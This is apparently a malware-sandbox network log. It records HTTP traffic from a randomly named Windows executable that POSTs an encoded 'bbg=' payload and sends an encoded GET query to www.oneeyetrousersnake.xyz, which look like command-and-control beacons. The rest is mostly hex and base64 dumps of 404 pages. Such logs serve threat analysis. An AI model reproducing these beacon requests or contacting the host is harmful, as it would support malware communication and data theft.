                                                                                      Jan 10, 2025 19:54:53.942558050 CET1236INData Raw: 76 46 69 6a 67 7a 37 5a 4a 41 50 2f 32 4f 4f 44 2f 70 69 6a 67 2f 36 5a 4a 41 50 2f 32 4b 4f 44 50 74 6b 6b 41 37 78 5a 35 4d 52 2f 32 57 53 45 4f 6c 67 6b 41 74 73 41 41 41 41 41 46 79 48 43 69 39 6c 6b 77 37 34 5a 5a 49 51 36 57 61 52 44 4d 68
                                                                                      Data Ascii: vFijgz7ZJAP/2OOD/pijg/6ZJAP/2KODPtkkA7xZ5MR/2WSEOlgkAtsAAAAAFyHCi9lkw74ZZIQ6WaRDMhjjwz1ZZAP/2SPEP9kjxD/ZI8Q/2SPEP9lkA//Y44M92SRC8lkkRHnZZIO+12OBDRhiwpJYo8O0VmFBihVfwAGYo4PdGeTEf9kjxD/ZI8Q/2SPEP9kjxD/Z5QR/2KOCHpVfwAGWYkGJWWQDs5kjQNRSG0AB12TABMA
                                                                                      Jan 10, 2025 19:54:53.942569971 CET1236INData Raw: 64 30 39 47 4d 67 41 42 41 41 41 41 41 4c 44 41 41 42 49 41 41 41 41 43 4f 46 77 41 41 4c 42 57 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 30 5a 47 56 45 30 63 47 6f 45 71 47 34 4c 70 4a 42
                                                                                      Data Ascii: d09GMgABAAAAALDAABIAAAACOFwAALBWAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGoEqG4LpJByweAZgAIcGCIEYCZoWEQgKhO1IhJwbC4dkAAE2AiQDj0QEIAWNOAeaYwyBI1uUCpID5cbuH9ecjgwq3YYQBPPTZWZv5Rs4HRaCOP21M7bnujyaj5ZWMd0mdbeD7Q+5niD7/////9+xTGS4Lgc1SVtaGBTYQJ1T9B/
                                                                                      Jan 10, 2025 19:54:53.947218895 CET1236INData Raw: 33 4f 2b 31 2f 63 39 4f 6a 30 6d 51 4f 7a 76 34 4f 37 75 49 66 56 6b 73 33 34 55 4d 6d 6a 79 72 4b 61 45 6f 53 56 66 64 4c 46 36 30 2b 4f 58 65 6c 6c 79 70 71 6a 54 61 55 6e 59 32 56 2f 59 5a 39 2b 5a 37 61 6b 6b 4f 47 41 39 47 6f 6e 54 58 47 6f
                                                                                      Data Ascii: 3O+1/c9Oj0mQOzv4O7uIfVks34UMmjyrKaEoSVfdLF60+OXellypqjTaUnY2V/YZ9+Z7akkOGA9GonTXGoK8XfgQZa38JGOYkoGNg+6I/7o9vkybIu2mgwR/4yUWR5ZiO5FbloolXmcttuawUqzvE1anTQI8Muw93hfOJAwnQaJyFqxOX/+jSm/vwZoSwiSgAABEnz83Cex/n0Vih8QOOcxrrVKn6mmKYhA3llp8FIMcmf/v1K/


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      48192.168.2.55004863.250.43.134804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:55.907044888 CET1844OUTPOST /jcfc/ HTTP/1.1
                                                                                      Host: www.oneeyetrousersnake.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.oneeyetrousersnake.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.oneeyetrousersnake.xyz/jcfc/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 35 77 73 44 32 42 45 77 6e 6e 45 6b 74 39 45 4b 64 32 37 64 4d 50 42 39 48 4a 39 56 7a 44 47 44 59 5a 66 59 7a 43 68 4b 63 72 4d 34 61 65 54 71 37 46 62 46 68 43 67 76 6f 76 63 4e 68 59 6b 77 54 73 37 6f 39 67 31 5a 41 37 39 4f 73 56 6e 42 50 57 43 38 36 72 42 31 2f 72 6f 48 32 4d 77 49 50 43 51 73 4f 37 46 4c 45 6d 35 37 6e 59 68 31 70 34 6f 39 53 54 4a 4f 71 66 63 36 31 62 67 5a 71 52 79 58 46 6b 79 55 41 77 34 72 54 69 38 70 65 6d 33 70 38 45 4a 71 72 44 76 32 56 41 4b 74 59 4d 2b 34 76 59 47 61 66 77 78 6f 32 38 4e 6f 49 67 4f 33 77 2b 64 56 5a 36 4f 42 69 72 6b 44 44 6b 6c 43 73 56 34 77 46 4c 54 57 4f 65 2b 4e 37 49 52 6a 62 4c 41 56 44 46 63 59 67 2f 45 4b 68 4f 66 56 54 46 66 79 4d 77 69 4a 55 61 36 35 4d 6d 35 58 56 42 55 53 58 36 54 37 58 70 69 64 73 72 52 30 4d 42 73 6b 50 2b 4b 46 41 65 4b 6f 66 36 71 41 67 62 73 64 39 56 6f 59 55 6c 45 4d 30 32 75 4c 76 68 6a 5a 4f 48 6f 30 74 77 6c 33 77 69 63 6b 4e 54 72 68 58 43 53 6f 52 2f 6e 52 41 45 4c 4a 41 73 48 6e 4e 75 65 4e 6a 31 [TRUNCATED]
                                                                                      Data Ascii: bbg=5wsD2BEwnnEkt9EKd27dMPB9HJ9VzDGDYZfYzChKcrM4aeTq7FbFhCgvovcNhYkwTs7o9g1ZA79OsVnBPWC86rB1/roH2MwIPCQsO7FLEm57nYh1p4o9STJOqfc61bgZqRyXFkyUAw4rTi8pem3p8EJqrDv2VAKtYM+4vYGafwxo28NoIgO3w+dVZ6OBirkDDklCsV4wFLTWOe+N7IRjbLAVDFcYg/EKhOfVTFfyMwiJUa65Mm5XVBUSX6T7XpidsrR0MBskP+KFAeKof6qAgbsd9VoYUlEM02uLvhjZOHo0twl3wickNTrhXCSoR/nRAELJAsHnNueNj1FR4QPElXDOhhi+IMggIJ6fXexkot2HIW8T+auf9a7uhdWohGHJ9EIjKLleZWW9O9LYQcj6pUeaVZ8HIAoiy4TQw9ZZ9l3tJAL+XMxIrFIIE+hbKLJJOMrr5aSZ0xLuZBENTL0BRp5UzXy/Vs704jU1bAbU0KfC3UsIar3MprOPKsjisjIBOiJkWZ80S8Q5SV69ZtYOHOj8wr1YRvkBYaHpsVRX5GpN9PD9UI76TkuVaRPl1zm1zLebAz20HzeMGN+C26AEI07chYDCdcWDogozHajrersPgOMYhdcVRR2BA/1/gfvGu+PUFty0Mg05FNd0Wly6oNd8pR8ADhLfoaziZn3y3v17Mpk7fnRDae1jxH1TxZxxUJ8KDQLaiU5S0jsIYhQ+W8JFT0tvPG3qN9+YMhyRoMf8LWZ5JHC8DUAXg63BLo11hikuZnY7lfIapjUDNOWKsVbEw1/4Ntd97Z06tz6ak2ZXfv6wXkUuuLYPAnwCEUIpZk/SNG75G4Fr03MTG4eSby99BfT89Vdrl6NgvciD+SojnWvL8uj5/bR5q7iPMW0G6Jiub4YjTfA5rNDi2cST7UrzSJsplWZtNJ6YpQeVT7JYBuCt/i/5XSuHDsqnWAkhn0D5aWcE0sHbM4W6cChHKrm3QXnte6FCBpGoFUJyHXLorXiU [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:56.687200069 CET1236INHTTP/1.1 404 Not Found
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:54:56 GMT
                                                                                      transfer-encoding: chunked
                                                                                      connection: close
                                                                                      Data Raw: 32 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 [TRUNCATED]
                                                                                      Data Ascii: 200<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihA2C42SgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3 [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:56.687227011 CET1236INData Raw: 58 66 50 4e 75 47 64 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c
                                                                                      Data Ascii: XfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4iE02PyxAS39N
                                                                                      Jan 10, 2025 19:54:56.687239885 CET448INData Raw: 65 36 39 39 73 45 4b 6a 47 59 32 67 4d 49 39 55 4c 67 58 34 57 67 75 31 44 75 55 63 79 39 51 6f 45 75 4d 76 71 36 31 70 79 48 67 2b 4a 38 50 6e 6b 45 35 66 52 48 73 54 31 39 44 38 46 45 4f 42 39 77 66 68 39 53 47 7a 5a 42 43 64 31 4d 61 37 6a 48
                                                                                      Data Ascii: e699sEKjGY2gMI9ULgX4Wgu1DuUcy9QoEuMvq61pyHg+J8PnkE5fRHsT19D8FEOB9wfh9SGzZBCd1Ma7jHKVYLZIZAsc+xDpOnLDj7xxZvrnHjUdOAdw6220zP9tWP3YucRRtabeV3Setztm+WNOWBmoLt2/tBOlb0uzZT2RZeWD+meWbaPOW9+GNrAeY+JjcDDfP8fAYe5cVFu/02q26h1KksDy45nbxTNgtVHK+YGydm0+mjY
                                                                                      Jan 10, 2025 19:54:56.687251091 CET1236INData Raw: 4d 38 51 59 6c 78 48 64 43 38 56 45 6d 31 56 7a 4a 35 46 49 73 67 66 66 52 30 75 4d 55 31 4b 31 4e 42 41 4b 4e 49 79 73 33 37 58 62 79 71 64 79 39 62 61 56 4d 4a 44 71 63 62 47 35 74 79 53 56 5a 73 5a 63 46 44 33 54 69 57 58 32 50 35 4b 71 43 53
                                                                                      Data Ascii: M8QYlxHdC8VEm1VzJ5FIsgffR0uMU1K1NBAKNIys37Xbyqdy9baVMJDqcbG5tySVZsZcFD3TiWX2P5KqCS/lnWaY6Y8u2/OLa181I//Q42NP3LXzq3Py82/g7sVWb73XzD+9qeRvi3uPmo2E7UTN39l/c/vnS9f4509N/A8B8Sp4dDZbzB3ORT/nQfsKPo+5M/4Drl+2uAmCHNc8PFrhPu8tF4Nbh5c2ncsUjH/KlPrl8PdmVdM
                                                                                      Jan 10, 2025 19:54:56.687258005 CET1236INData Raw: 41 57 6c 6c 4c 74 6e 4c 62 6b 4b 57 4d 49 54 78 79 49 53 39 45 46 4f 48 55 36 75 68 36 67 64 61 62 41 50 76 61 72 53 33 45 78 43 6d 6c 30 43 39 42 79 31 78 76 72 50 6f 37 4e 7a 51 56 47 71 44 35 33 77 71 62 70 31 7a 6e 68 43 2b 74 2f 62 46 67 33
                                                                                      Data Ascii: AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C9By1xvrPo7NzQVGqD53wqbp1znhC+t/bFg3qhva6BbojXb/vVSSp4SJC3HSTZ78jQQA5F9NwArbx4yTtgBXfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4a
                                                                                      Jan 10, 2025 19:54:56.687268019 CET1236INData Raw: 64 62 44 72 2b 58 6b 6e 4b 69 33 4f 7a 4a 55 32 35 70 49 38 43 65 62 4b 52 6a 47 37 37 78 54 7a 7a 4b 46 4c 38 54 73 33 37 41 62 6e 4f 73 59 31 31 46 73 48 37 4d 79 4c 4d 64 37 63 36 4e 4a 31 4c 4e 64 63 37 6d 71 61 30 59 77 6e 30 59 6f 62 4f 63
                                                                                      Data Ascii: dbDr+XknKi3OzJU25pI8CebKRjG77xTzzKFL8Ts37AbnOsY11FsH7MyLMd7c6NJ1LNdc7mqa0Ywn0YobOc9y2Z/nh8z9UHnAeejTZucry9swpghar8rGUuj7MGKdktkKse699sEKjGY2gMI9ULgX4Wgu1DuUcy9QoEuMvq61pyHg+J8PnkE5fRHsT19D8FEOB9wfh9SGzZBCd1Ma7jHKVYLZIZAsc+xDpOnLDj7xxZvrnHjUdOA
                                                                                      Jan 10, 2025 19:54:56.687279940 CET1236INData Raw: 61 73 65 36 34 2c 41 41 41 42 41 41 45 41 45 42 41 41 41 41 45 41 49 41 42 6f 42 41 41 41 46 67 41 41 41 43 67 41 41 41 41 51 41 41 41 41 49 41 41 41 41 41 45 41 49 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                      Data Ascii: ase64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGCDAB1jkQ6hY5ALwGGLCkkAAAABAAAAAAAAAAAAAAAAY5AORWOQDL5jkAykX4cAIAAAAAAAAAAAAAAAAAAAAABlkQuZaZYQ/2iVEP9mkw76ZJAOi39/AAIAAAABY5ELhWaTDvlolRD/aZcQ/
                                                                                      Jan 10, 2025 19:54:56.687292099 CET1236INData Raw: 53 50 45 50 39 6b 6a 78 44 2f 5a 49 38 51 2f 32 61 54 45 66 39 6d 6b 67 37 77 59 49 67 4c 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 6d 6b 77 78 56 5a 5a 41 4f 34 32 65 54
                                                                                      Data Ascii: SPEP9kjxD/ZI8Q/2aTEf9mkg7wYIgLLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABmkwxVZZAO42eTEf9mkg//ZpEP/2eUEf9mkhDkY40FWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGCDAB1jjwxpY44MyGOPDMtikAxqXYgRHgAAAAAAAAAAAAAAAAAAAAAAAAAA5+cAAMGDAADxjwAA+B8AAMADA
                                                                                      Jan 10, 2025 19:54:56.687303066 CET552INData Raw: 4e 65 74 76 65 33 68 47 48 4c 64 55 38 37 32 37 76 38 76 35 72 47 78 65 58 62 68 67 4d 4f 4d 62 53 59 77 67 51 6b 77 49 47 41 51 30 41 51 70 74 30 53 72 75 39 56 71 68 52 61 53 48 49 6a 58 33 37 44 33 57 76 67 68 68 41 44 43 2b 41 6b 7a 36 36 62
                                                                                      Data Ascii: Netve3hGHLdU8727v8v5rGxeXbhgMOMbSYwgQkwIGAQ0AQpt0Sru9VqhRaSHIjX37D3WvghhADC+Akz66b2f+/U/o7tLMy1No8LyAE8KVFmNLJlR3WdjdqqZZ/j7vqB3P5J2z+mYIE2dpLyUgAFD4A+31NpuR/tJc3/BpRBSpzajq23Rjo0mv91at9NuOey3ajptsitpUBqcUnpMsigIJAfCBN73LJdpisBoNC2NvDQSfkgJPE3
                                                                                      Jan 10, 2025 19:54:56.687338114 CET1236INData Raw: 6f 47 4e 67 2b 36 49 2f 37 6f 39 76 6b 79 62 49 75 32 6d 67 77 52 2f 34 79 55 57 52 35 5a 69 4f 35 46 62 6c 6f 6f 6c 58 6d 63 74 74 75 61 77 55 71 7a 76 45 31 61 6e 54 51 49 38 4d 75 77 39 33 68 66 4f 4a 41 77 6e 51 61 4a 79 46 71 78 4f 58 2f 2b
                                                                                      Data Ascii: oGNg+6I/7o9vkybIu2mgwR/4yUWR5ZiO5FbloolXmcttuawUqzvE1anTQI8Muw93hfOJAwnQaJyFqxOX/+jSm/vwZoSwiSgAABEnz83Cex/n0Vih8QOOcxrrVKn6mmKYhA3llp8FIMcmf/v1K/7rO4aWe6KndImmd60pQaQFSB4zkK+eAH5/D/+7dzvrQUWoLUA6WmZrkc0oJXXPQU85Hr73WBuFQnelibeVFJLalBgVHIq3318
                                                                                      Jan 10, 2025 19:54:56.692293882 CET1236INData Raw: 46 53 30 66 4b 68 41 41 61 70 51 47 56 53 75 48 46 57 68 47 71 70 52 67 36 6f 74 46 68 59 57 42 79 30 36 4c 69 79 6d 65 4c 53 34 39 73 4c 57 74 52 56 70 57 2f 64 67 39 39 50 51 48 71 54 44 48 6d 61 68 50 63 6d 47 50 63 31 44 65 78 32 47 76 59 6d
                                                                                      Data Ascii: FS0fKhAAapQGVSuHFWhGqpRg6otFhYWBy06LiymeLS49sLWtRVpW/dg99PQHqTDHmahPcmGPc1Dex2GvYmivSuAGDBA3YcQAmeqshC57/3PxyB/6bOUD0YMcMw3IISwurzxeIBBT2OMQc/hGIPejUcM+rg6x6DP830M+jo/w6CfqwsM+n2R7w7PCtfJTLks8GGC+qvuBePL3Gcz1AVPqPDkHDEgHAE5A5sQMVLKq+NE3KWf/jxr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      49192.168.2.55004963.250.43.134804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:54:58.451338053 CET533OUTGET /jcfc/?bbg=0yEj10EZmitUhtYjdkKec5xdEI8NxyKfcM7U8ztUVuouZsC423bB43cLiOUB/IRFTMn/ihN/EtpU6HblaUashI5siqQp3v4hHHpGQ8dsEXU8uptspqs9cFl8luc9oYZGow==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.oneeyetrousersnake.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:59.022778988 CET1236INHTTP/1.1 404 Not Found
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:54:58 GMT
                                                                                      transfer-encoding: chunked
                                                                                      connection: close
                                                                                      Data Raw: 32 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 [TRUNCATED]
                                                                                      Data Ascii: 200<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihA2C42SgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3 [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:59.022793055 CET224INData Raw: 58 66 50 4e 75 47 64 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c
                                                                                      Data Ascii: XfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduF
                                                                                      Jan 10, 2025 19:54:59.022808075 CET1236INData Raw: 5a 76 66 5a 73 57 34 69 45 30 32 50 79 78 41 53 33 39 4e 5a 63 5a 39 6f 43 44 4b 35 34 2f 41 7a 6e 37 44 2b 35 41 68 66 62 54 70 79 49 6d 79 36 75 74 67 41 45 67 4d 6c 6d 72 79 35 51 6f 66 31 4e 4f 52 6b 4a 49 4a 67 6f 4f 51 46 4d 4f 52 6b 4a 73
                                                                                      Data Ascii: ZvfZsW4iE02PyxAS39NZcZ9oCDK54/Azn7D+5AhfbTpyImy6utgAEgMlmry5Qof1NORkJIJgoOQFMORkJsCi8eC/23d2Fvqpe4xMX4uTV3+5nJMC+hga8tFRv2ANNb129McFJn4WRAASjWOj10lgNeGKCi37y1MNYgFjTxpN4pv6xGax/vYgDcTGNaCwAAeK9/UumwH71y5eD0YsRO/nwrq2f4/wme1sR612xVVtuzgdvcgRU72
                                                                                      Jan 10, 2025 19:54:59.022881985 CET1236INData Raw: 78 54 4e 67 74 56 48 4b 2b 59 47 79 64 6d 30 2b 6d 6a 59 63 43 6b 77 4c 77 59 46 44 72 32 53 4a 75 77 58 57 45 6d 52 6e 54 35 44 78 76 41 5a 4a 66 61 73 76 45 36 39 34 6d 70 55 6d 4b 58 64 5a 47 68 46 70 53 39 61 35 4a 61 36 34 4b 2f 58 41 44 5a
                                                                                      Data Ascii: xTNgtVHK+YGydm0+mjYcCkwLwYFDr2SJuwXWEmRnT5DxvAZJfasvE694mpUmKXdZGhFpS9a5Ja64K/XADZj5fiVsQeQnwpFLi1GD0TVwRrX0D5+IFi4BVOrVZNqeSMAmbODjZvbYZT4K17S9Vj7LhtzHrr/YKlvTj/NjGxuYFT3Iu7f0okac7Wo9gJP3J3p6rjlVhZwWruneg6YGhXL5O9pwChPdsvUiM8QYlxHdC8VEm1VzJ5F
                                                                                      Jan 10, 2025 19:54:59.022893906 CET1236INData Raw: 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a
                                                                                      Data Ascii: x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS
                                                                                      Jan 10, 2025 19:54:59.022905111 CET1236INData Raw: 63 6b 42 48 34 4e 48 75 4a 4d 6e 55 51 5a 42 4e 64 4c 77 66 56 4b 70 36 74 75 36 2f 73 44 6c 74 44 36 69 51 38 59 4f 58 73 66 7a 6f 2f 59 6a 4f 6c 56 75 69 57 59 57 6f 7a 47 78 51 44 41 67 62 4e 6b 57 52 70 2f 55 68 64 69 6d 63 58 4a 47 7a 76 2b
                                                                                      Data Ascii: ckBH4NHuJMnUQZBNdLwfVKp6tu6/sDltD6iQ8YOXsfzo/YjOlVuiWYWozGxQDAgbNkWRp/UhdimcXJGzv+HrFPrgIBJt4qjX19sQTliUBZEDmnBMB6+i2UmPZtbbHSp1zPrtj43aQAVJkRLPsn7qWDxSIxXTiUI+Vq4ScnQeuE1sXxRHQv7qWCfu5q4RW7RLJfBgORpUMrNwxY2BM7wdQZGWprItdzwbdbDr+XknKi3OzJU25pI
                                                                                      Jan 10, 2025 19:54:59.022916079 CET1236INData Raw: 78 54 41 41 75 77 73 76 4f 5a 38 2b 56 6f 66 43 31 58 61 69 6d 65 43 6c 38 4a 4d 57 5a 68 6a 69 68 48 2b 41 48 38 4d 75 76 48 72 38 45 6a 54 4b 67 39 77 55 44 5a 70 30 4f 33 50 75 62 58 4a 47 62 42 4a 30 74 36 72 7a 65 65 47 46 76 42 4a 46 38 47
